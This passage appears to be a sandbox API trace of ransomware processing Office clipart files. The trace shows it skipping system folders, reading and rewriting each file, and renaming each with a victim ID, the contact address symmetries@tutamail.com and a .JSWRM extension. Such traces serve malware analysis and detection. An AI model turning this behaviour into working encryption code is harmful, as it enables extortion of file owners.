office\\root\\clipart\\pub60cor\\pe00640_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0092.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.929] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6028, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00668_.WMF", cAlternateFileName="")) returned 1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2=".") returned 1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2="..") returned 1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2="...") returned 1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2="windows") returned -1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2="recovery") returned -1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2="perflogs") returned -1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2="documents and settings") returned 1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2="system volume information") returned -1 [0092.929] lstrcmpiW (lpString1="PE00668_.WMF", lpString2="msocache") returned 1 [0092.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00668_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00668_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00668_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0092.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00668_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00668_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00668_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0092.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0092.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00668_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.930] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24616) returned 1 [0092.930] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6020) returned 0x24d210 [0092.930] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6020, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.935] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6020, lpOverlapped=0x0) returned 1 [0092.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.935] CloseHandle (hObject=0x314) returned 1 [0092.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0092.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0092.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0092.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0092.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0092.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.935] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00668_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00668_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0092.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.936] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x108a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00685_.WMF", cAlternateFileName="")) returned 1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2=".") returned 1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2="..") returned 1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2="...") returned 1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2="windows") returned -1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2="recovery") returned -1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2="perflogs") returned -1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2="documents and settings") returned 1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2="system volume information") returned -1 [0092.936] lstrcmpiW (lpString1="PE00685_.WMF", lpString2="msocache") returned 1 [0092.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0092.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00685_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00685_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00685_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0092.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0092.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00685_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00685_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00685_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0092.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0092.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00685_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.937] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4234) returned 1 [0092.937] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1080) returned 0x23fc98 [0092.937] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1080, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1080, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.941] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1080, lpOverlapped=0x0) returned 1 [0092.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.941] CloseHandle (hObject=0x314) returned 1 [0092.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0092.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0092.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0092.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0092.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.942] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00685_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00685_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.943] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00686_.WMF", cAlternateFileName="")) returned 1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2=".") returned 1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2="..") returned 1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2="...") returned 1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2="windows") returned -1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2="recovery") returned -1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2="perflogs") returned -1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2="documents and settings") returned 1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2="system volume information") returned -1 [0092.943] lstrcmpiW (lpString1="PE00686_.WMF", lpString2="msocache") returned 1 [0092.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0092.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00686_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00686_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00686_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00686_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00686_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00686_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00686_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.944] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4398) returned 1 [0092.944] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1120) returned 0x205850 [0092.944] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1120, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.949] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1120, lpOverlapped=0x0) returned 1 [0092.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.949] CloseHandle (hObject=0x314) returned 1 [0092.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0092.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0092.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0092.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0092.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0092.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.950] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00686_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00686_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0092.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.951] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1138, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00693_.WMF", cAlternateFileName="")) returned 1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2=".") returned 1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2="..") returned 1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2="...") returned 1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2="windows") returned -1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2="recovery") returned -1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2="perflogs") returned -1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2="documents and settings") returned 1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2="system volume information") returned -1 [0092.951] lstrcmpiW (lpString1="PE00693_.WMF", lpString2="msocache") returned 1 [0092.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0092.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00693_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 